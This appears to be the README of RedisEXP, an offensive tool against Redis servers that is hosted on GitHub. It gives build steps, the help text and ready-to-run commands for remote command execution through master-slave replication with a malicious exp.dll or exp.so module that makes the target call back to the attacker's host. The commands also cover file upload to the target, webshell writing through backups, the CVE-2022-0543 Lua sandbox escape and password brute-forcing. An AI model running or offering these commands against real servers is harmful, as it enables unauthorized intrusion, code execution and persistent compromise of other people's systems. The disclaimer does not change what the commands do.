Redis Exploit Tool

superior_hosting_service

Redis

Statement


This tool is for personal safety research study only. Any direct or indirect consequences and losses caused by the dissemination and use of this tool are the responsibility of the user himself, and the tool author does not assume any responsibility for this.

Compile Code

git clone https://github.com/yuyan-sec/RedisEXP.git
cd RedisEXP
go build
RedisEXP.exe -h
NAME:
   Redis Exp - Redis 利用工具

USAGE:
   Redis Exp [global options] command [command options] [arguments...]

COMMANDS:
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --rhost value, -r value      目标IP
   --rport value, --rp value    目标端口 (default: "6379")
   --pwd value                  Redis密码
   --lhost value, -l value      本地IP
   --lport value, --lp value    本地端口 (default: "21000")
   --dll value, --so value      设置 exp.dll | exp.so (default: "exp.dll")
   --cmd value, -c value        命令执行
   --console                    使用交互式 shell (default: false)
   --exec                       主从复制命令执行 (default: false)
   --upload                     主从复制文件上传 (default: false)
   --rpath value, --path value  保存在目标的目录 (default: ".")
   --rfile value, --rf value    保存在目标的文件名
   --lfile value, --lf value    需要上传的文件名
   --lua                        Lua沙盒绕过命令执行 CVE-2022-0543 (default: false)
   --shell                      备份写 Webshell (default: false)
   --help, -h                   show help (default: false)

Master-Slave Replication Vulnerability

Command execution:

  • By default Windows loadsexp.dll
  • Default is non-interactive shell
RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -c whoami
RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -console

RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -c whoami
RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -console
re1

File Upload:

RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -upload -rfile 1.txt -lfile 2.txt
re2

Backup write Webshell

RedisExp.exe -rhost 192.168.211.128 -shell
re3

Lua sandbox bypass command execution CVE-2022-0543

RedisExp.exe -rhost 192.168.211.130 -lua -console
re4

Blasting Redis passwords

RedisExp.exe -r 192.168.211.128 -brute -pwdf ../pass.txt
re5

reference

This tool is based on a large number of excellent articles and toolswriteTranscription complete, thank you so much for these selfless sharers!

https://github.com/zyylhn/redis_rce
https://github.com/0671/RabR
https://github.com/r35tart/RedisWriteFile

The RedisEXP is a github repository by yuyan-sec